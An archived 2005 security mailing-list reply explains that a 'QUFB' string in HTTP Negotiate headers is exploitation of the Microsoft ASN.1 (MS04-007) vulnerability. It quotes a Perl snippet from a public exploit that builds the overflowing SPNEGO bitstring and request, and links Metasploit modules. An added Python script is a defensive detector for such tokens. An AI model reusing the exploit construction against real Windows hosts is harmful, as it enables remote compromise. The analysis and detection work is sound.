Re: New http attack?

From: Jason Falciola (falciola_at_us.ibm.com)
Date: 06/08/05

    To: "Keith T. Morgan" <keith.morgan@terradon.com>
    Date: Wed, 8 Jun 2005 16:08:14 -0400
    
    

    On Wednesday, June 08, 2005 1:32 PM, "Keith T. Morgan"
    keith.morgan@terradon.com wrote:

    ] We've seen an attack that triggered a snort bleeding-edge hit for "smb
    ] over http authentication." This isn't particularly alarming, but, what
    ] caught my attention is what appears to be a very large buffer in part of
    ] the packet.

    ] The ascii decoded capture looks a bit like this:

    ] GET / HTTP/1.0
    ] Host: obfuscated
    ] Authorization: Negotiate <what may be an encrypted password>
    ] QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB.

    ] This "QUFB" string is repeated for 1400 bytes or so, and I'm assuming
    ] went beyond the single packet capture I have.

    ] The IIS logs indicate a simple GET / with a 401 response code.

    ] Has anyone seen this "QUFBQUFB" string in a worm, virus, or exploit
    ] floating around out there somewhere? I think chances of this being a FP
    ] are low since we're not using NTLM or windows native/ad authentication
    ] on this site.

    Keith,

    This is due to exploitation of a vulnerability [1] in Microsoft's ASN.1
    implementation. This issue is patched in MS04-007 [2], which also fixed
    another vulnerability reported by eEye [3].

    We recently notified our clients after observing a surge in this activity
    over the past several weeks, often from .edu sources. This may be
    related to the fact that a reliable (on Windows 2000 <= SP4 and XP <= SP1)
    and easy to use exploit is available from Solar Eclipse [4] and has
    recently been ported over to the Metasploit framework. [5] [6] Our lab
    testing confirms that the Solar Eclipse exploit generates packets that
    match what we're seeing in the wild.

    A large amount of the traffic we observe attempting to exploit this
    vulnerability is on port 80, although ports 139 and 445 are also exploit
    vectors. Attacks on these ports have all been observed in conjunction with
    rbot and sdbot variants. Keep in mind that port 25 (Exchange) and UDP 88
    (Kerberos) are also potential avenues of attack.

    I've included a snippet of the relevant code [7] from the exploit by Solar
    Eclipse [4]. As dullien@gmx.de mentioned, the base64 encoding is
    responsible for the string of 'AAA's (commonly used to overflow a buffer)
    being seen as 'QUFB'.

    [1] <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818>
    [2] <http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx>
    [3] <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
    [4] <http://www.phreedom.org/solar/exploits/msasn1-bitstring/> - a dir
    listing from the parent directory shows this as last modified in late April
    2005
    [5] <http://metasploit.com/projects/Framework/modules/exploits/msasn1_ms04_007_killbill.pm> - ported from [4]
    [6] <http://metasploit.com:55555/EXPLOITS?MODULE=msasn1_ms04_007_killbill&MODE=PAYLOAD&OPT_TARGET=0>

    [7] From <http://www.phreedom.org/solar/exploits/msasn1-bitstring/>

    <snip>
    Constructing the exploit

    $bitstring =
        constr(
            bits("a"x1040),
            "\x03\x00",
            constr(
                bits("B"x1033),
                constr(
                    bits($fw, $bk)
                ),
                constr(
                    bits("C"x1040),
                    constr(
                        bits("\xeb\06\x90\x90\x90\x90\x90\x90"),
                        bits("D"x1040),
                    )
                )
            )
        );

    $spnego =
        "\x60" . asn1( # Application Constructed Object
            "\x06\x06\x2b\x06\x01\x05\x05\x02" . # SPNEGO OID
            "\xa0" . asn1( # NegTokenInit (0xa0)
                "\x30" . asn1( # Constructed Sequence
                    "\xA1" . asn1( # ContextFlags (0xa1)
                        $bitstring
                    )
                )
            )
        );

    $request =
        "GET / HTTP/1.1\r\n" .
        "Authorization: Negotiate " . encode_base64($spnego, "") . "\r\n" .
        "\r\n";
    <snip>

    [$spnego is the result of the above concatenations, which are then encoded
    using base64]

    Jason Falciola
    Security Intelligence Analyst
    IBM Managed Security Services
    falciola@us.ibm.com
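The following is an added example (not code from the post, the list, or the Solar Eclipse exploit it quotes) showing the defender's side of what the message explains: that a run of 'A' filler bytes base64-encodes to the "QUFB" pattern seen on the wire, and how a log or capture triage script can pull the "Authorization: Negotiate" token out of a request, decode it, and flag an oversized or filler-dominated token before any signature-based rule is consulted. The sample request and the small "benign" token are constructed here for the example, and the length and run thresholds are assumptions to be tuned against what a site's real clients send.

```python
import base64
import re
from typing import Optional

# SPNEGO mechanism OID (1.3.6.1.5.5.2) DER-encoded as it sits inside a
# GSS-API token: tag 0x06, length 6, then the OID bytes. Same bytes as in
# the snippet quoted in the message above.
SPNEGO_OID = bytes.fromhex("06062b0601050502")

# Constructed sample of the request the thread describes: a plain GET whose
# Negotiate token is nothing but a run of 'A' bytes, base64-encoded. This is
# built here for the example and is not a capture from the list post.
SAMPLE_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Host: obfuscated\r\n"
    "Authorization: Negotiate " + base64.b64encode(b"A" * 1400).decode() + "\r\n"
    "\r\n"
)

# A short, structurally plausible token for contrast: the 0x60 application
# tag wrapping the SPNEGO OID. Also constructed; not a real negotiation token.
BENIGN_TOKEN = bytes([0x60, len(SPNEGO_OID)]) + SPNEGO_OID

_NEGOTIATE_RE = re.compile(r"^Authorization:\s*Negotiate\s+(\S+)",
                           re.IGNORECASE | re.MULTILINE)


def extract_negotiate_token(raw_request: str) -> Optional[bytes]:
    """Return the decoded Negotiate token, or None if the header is absent.

    Raises ValueError if the header is present but is not valid base64.
    """
    m = _NEGOTIATE_RE.search(raw_request)
    if not m:
        return None
    b64 = m.group(1).rstrip(".")       # tolerate a trailing '.' like the capture quoted above
    b64 += "=" * (-len(b64) % 4)       # restore padding if the capture dropped it
    return base64.b64decode(b64, validate=True)  # binascii.Error is a ValueError


def longest_repeated_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value (0 for empty input)."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def assess_negotiate_token(token: bytes, max_len: int = 1024,
                           run_threshold: int = 256) -> dict:
    """Heuristic triage of a decoded Negotiate token.

    max_len and run_threshold are assumptions for this example: legitimate
    Kerberos tokens can run to a few kilobytes, so calibrate max_len against
    the site's own clients before alerting on it.
    """
    reasons = []
    if len(token) > max_len:
        reasons.append(f"token length {len(token)} exceeds {max_len} bytes")
    if not token.startswith(b"\x60"):
        reasons.append("token does not begin with the GSS-API application tag 0x60")
    if SPNEGO_OID not in token[:16]:
        reasons.append("SPNEGO OID not found at the start of the token")
    run = longest_repeated_run(token)
    if run >= run_threshold:
        reasons.append(f"run of {run} identical bytes (filler such as 'AAAA...')")
    return {
        "length": len(token),
        "longest_run": run,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def triage_request(raw_request: str) -> dict:
    """Apply the checks to one raw HTTP request; absent or undecodable headers are reported."""
    try:
        token = extract_negotiate_token(raw_request)
    except ValueError:
        return {"negotiate_present": True, "suspicious": True,
                "reasons": ["Negotiate header is not valid base64"]}
    if token is None:
        return {"negotiate_present": False, "suspicious": False, "reasons": []}
    result = assess_negotiate_token(token)
    result["negotiate_present"] = True
    return result


if __name__ == "__main__":
    print(base64.b64encode(b"AAA").decode())   # the "QUFB" unit seen on the wire
    print(triage_request(SAMPLE_REQUEST))
```

On a site that, like the one in the thread, does not use Windows integrated authentication, the presence of any Negotiate header is itself worth an alert; the length, 0x60 tag, OID and filler-run checks are there to rank the hits where Negotiate is legitimately in use.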

